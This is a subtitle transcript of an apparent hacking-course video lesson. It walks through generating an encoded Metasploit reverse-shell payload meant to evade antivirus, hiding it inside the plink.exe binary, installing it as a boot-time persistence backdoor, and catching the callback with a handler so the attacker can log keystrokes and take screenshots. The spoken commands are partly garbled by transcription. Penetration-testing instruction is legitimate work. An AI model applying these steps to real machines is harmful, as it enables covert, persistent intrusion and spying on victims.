1
00:00:00,300 --> 00:00:05,990
OK, so one other thing that we can do that's very helpful with with the interpreter is actually installing

2
00:00:06,000 --> 00:00:06,590
a back door.

3
00:00:06,900 --> 00:00:11,060
So when you gain access to a house like we do have now, you know, you want to make sure that you can

4
00:00:11,070 --> 00:00:12,060
retain your access.

5
00:00:12,420 --> 00:00:16,120
And I'm aware to how you do this is installing the back doors.

6
00:00:16,170 --> 00:00:21,330
This is pretty much just a change to the computer to ensure that you can always get back in.

7
00:00:21,360 --> 00:00:26,100
So let's go in and check how my interpreter can allow us to create somewhat of a back door.

8
00:00:26,270 --> 00:00:29,580
OK, so let's go ahead and try to get this back door set up.

9
00:00:29,580 --> 00:00:30,350
So it's pretty neat.

10
00:00:30,630 --> 00:00:36,300
So I'm an interpreter or I'm in metastable and I have I did the sessions commands.

11
00:00:36,530 --> 00:00:39,600
You have a session right now over 80.

12
00:00:39,600 --> 00:00:41,020
That's pretty much what we just did.

13
00:00:41,340 --> 00:00:46,440
So what we're going to do is we're going to actually create another executable and then we're going

14
00:00:46,440 --> 00:00:48,700
to inject that over and have our back door.

15
00:00:48,960 --> 00:00:52,880
So the first thing that we're going to want to do, you remember that that photo that I showed you guys?

16
00:00:52,890 --> 00:00:54,950
I had a bunch of windows Balnaves in them.

17
00:00:55,230 --> 00:00:56,390
We're going to use one of those.

18
00:00:57,000 --> 00:00:58,650
So we're going to create another malware.

19
00:00:58,650 --> 00:01:00,420
Using something in there is the Penlington.

20
00:01:01,770 --> 00:01:08,670
So I'm going to do a little bit something like new when it comes to a massive.

21
00:01:09,060 --> 00:01:18,420
So let's just open up a new tab here so we'll see MSF venom and then we're going to do P then this is

22
00:01:18,420 --> 00:01:19,030
the payload.

23
00:01:19,050 --> 00:01:23,100
So Windows interpreter slash reverse.

24
00:01:23,100 --> 00:01:25,920
Tsipi There we go.

25
00:01:26,190 --> 00:01:34,740
And then we're going to put our hosts just a usual one on to the one six eight five six seven oh port.

26
00:01:34,830 --> 00:01:37,980
This time we're going to send our port to four four three.

27
00:01:37,990 --> 00:01:41,400
So that's the port that we're going to be listening over dash e.

28
00:01:41,400 --> 00:01:47,130
We're going to use the same exact encoder because that it's going to help us get past the antivirus.

29
00:01:47,580 --> 00:01:55,380
So she a good night and then we're going to do we're going to air through nine times this time to obfuscate

30
00:01:55,380 --> 00:01:59,180
it a little bit more, help protect us from that, maybe just a little bit more.

31
00:01:59,850 --> 00:02:03,420
The file type stuff is going to be easy this time.

32
00:02:03,840 --> 00:02:11,460
We're actually going to do a dash X and this is going to allow us to pick a file to actually inject

33
00:02:11,460 --> 00:02:13,280
our payload into our creating.

34
00:02:13,530 --> 00:02:23,000
So in this case, we're going to do slash USAR, share slash windows resources, such binaries, slash

35
00:02:23,010 --> 00:02:28,050
P link that you see, that's what we're going to use and then we're going to do a dash o and just say,

36
00:02:28,170 --> 00:02:29,160
hey, I'll put it.

37
00:02:29,160 --> 00:02:37,560
Is this going to call it the TCP XY and then go to enter and then it should work out at about a minute

38
00:02:37,560 --> 00:02:41,870
or two and then we're going to hop back into metastable.

39
00:02:42,090 --> 00:02:43,800
OK, so I'm back in my display.

40
00:02:44,400 --> 00:02:50,610
So now we're going to go ahead and use the module that's going to allow us to install a back door.

41
00:02:50,880 --> 00:02:59,040
So that's going to use post windows, slash, manage, slash persistance.

42
00:03:00,660 --> 00:03:06,040
Assistance underscore, you see there you go.

43
00:03:06,390 --> 00:03:09,540
So now we're here, so we're going to do options.

44
00:03:09,910 --> 00:03:16,020
We've got two new options, spelled it correctly and as you can see, already have some stuff set up

45
00:03:16,020 --> 00:03:16,260
here.

46
00:03:16,890 --> 00:03:21,120
So what you're going to want to do is set the artistic path.

47
00:03:21,450 --> 00:03:26,760
So set this is just the payload that we created, so set.

48
00:03:26,760 --> 00:03:28,290
So you just do whatever it is.

49
00:03:28,290 --> 00:03:36,110
So me, it is slash Holmes Ashkali slash payloads, slash TCAP that you see.

50
00:03:36,720 --> 00:03:38,070
So that's already set for me.

51
00:03:38,070 --> 00:03:39,360
And then Yasou also.

52
00:03:39,390 --> 00:03:45,120
So you see up here when I did the sessions come in, we have an ID number for the session.

53
00:03:45,300 --> 00:03:47,440
We need this session open in order to do this.

54
00:03:47,740 --> 00:03:53,730
So right now it's 11, so I'm going to set the session to 11.

55
00:03:55,070 --> 00:03:57,570
And then we're good to go after that.

56
00:03:57,590 --> 00:04:01,590
So now all you have to do is type and exploit and you'll be good to go.

57
00:04:01,610 --> 00:04:06,830
It's going to go through and appear to is doing is going to the machine using their session, is copying

58
00:04:06,830 --> 00:04:12,500
this file over and putting it somewhere where it's going to automatically run whenever the system is

59
00:04:12,500 --> 00:04:13,100
put it up.

60
00:04:13,430 --> 00:04:20,720
And the way that you can actually test this out is to go to that Windows machine, reboot it and log

61
00:04:20,720 --> 00:04:21,230
back in.

62
00:04:21,800 --> 00:04:24,980
And then but you also don't want to start a handler here.

63
00:04:24,980 --> 00:04:29,920
So once this is done, we're going to start a handler and we're going to be listening for the connection.

64
00:04:29,940 --> 00:04:34,750
So whenever they log back in, it's going to be trying to, like, reach out to us.

65
00:04:35,060 --> 00:04:35,930
So let's see.

66
00:04:35,930 --> 00:04:40,370
Let's go to use multi handler.

67
00:04:43,350 --> 00:04:48,040
So now we already have our Peloso, just two options, real quick to make sure we get to go.

68
00:04:48,060 --> 00:04:53,900
So here we're going to want to set out four to four for three, because that's the port that our our

69
00:04:53,910 --> 00:04:56,430
payload is trying to reach out to us over.

70
00:04:57,090 --> 00:05:01,020
And outside of that, we don't really have to do much except hit, run and then wait for it.

71
00:05:01,260 --> 00:05:05,940
And all you have to do is really if you reboot the Windows machine.

72
00:05:07,390 --> 00:05:15,700
It will attempt well, pretty much when I suspect it will run the file and then it will start beaconing

73
00:05:15,700 --> 00:05:18,830
out to you and then you'll get a show pretty much.

74
00:05:18,850 --> 00:05:24,190
So you just run this within the machine and you kind of just wait.

75
00:05:24,490 --> 00:05:26,540
OK, so we started the machine.

76
00:05:26,560 --> 00:05:30,370
I waited a couple of minutes and now we have some interpretor sessions going.

77
00:05:30,370 --> 00:05:34,000
So you might see that it opens up a couple or quite a few.

78
00:05:34,660 --> 00:05:35,450
I've Kano's.

79
00:05:35,480 --> 00:05:37,630
I think it's because I've done this multiple times.

80
00:05:37,630 --> 00:05:38,440
I didn't clean it up.

81
00:05:38,620 --> 00:05:45,310
But when you do it, you'll see that you have to show typing like help and you have full access and

82
00:05:45,310 --> 00:05:46,610
you do everything that you need to do.

83
00:05:46,630 --> 00:05:50,110
You can start watching the keystrokes.

84
00:05:50,110 --> 00:05:53,630
You could take screen shots, you do all kinds of stuffs.

85
00:05:53,890 --> 00:05:58,390
So now you know how to create a back door that's going to be persistent no matter what.

86
00:05:58,390 --> 00:06:01,330
And you always have access to that machine.

87
00:06:02,200 --> 00:06:07,750
OK, so now we know how to get into a network, we know how to conduct post exploitation activities,

88
00:06:07,750 --> 00:06:12,570
we know how to create back doors, so we know how to hack into networks.

89
00:06:12,580 --> 00:06:18,700
And now it's up to you to kind of take those skills and foster them, try a lot of different of the

90
00:06:18,700 --> 00:06:21,700
commands that we didn't do, just experiment a little bit.

91
00:06:21,730 --> 00:06:26,560
So the next thing we need to do is actually going over how to hack into Web applications.

92
00:06:26,770 --> 00:06:28,900
So I appreciate you listening as far.

93
00:06:28,960 --> 00:06:30,400
And I'll see you guys in the next section.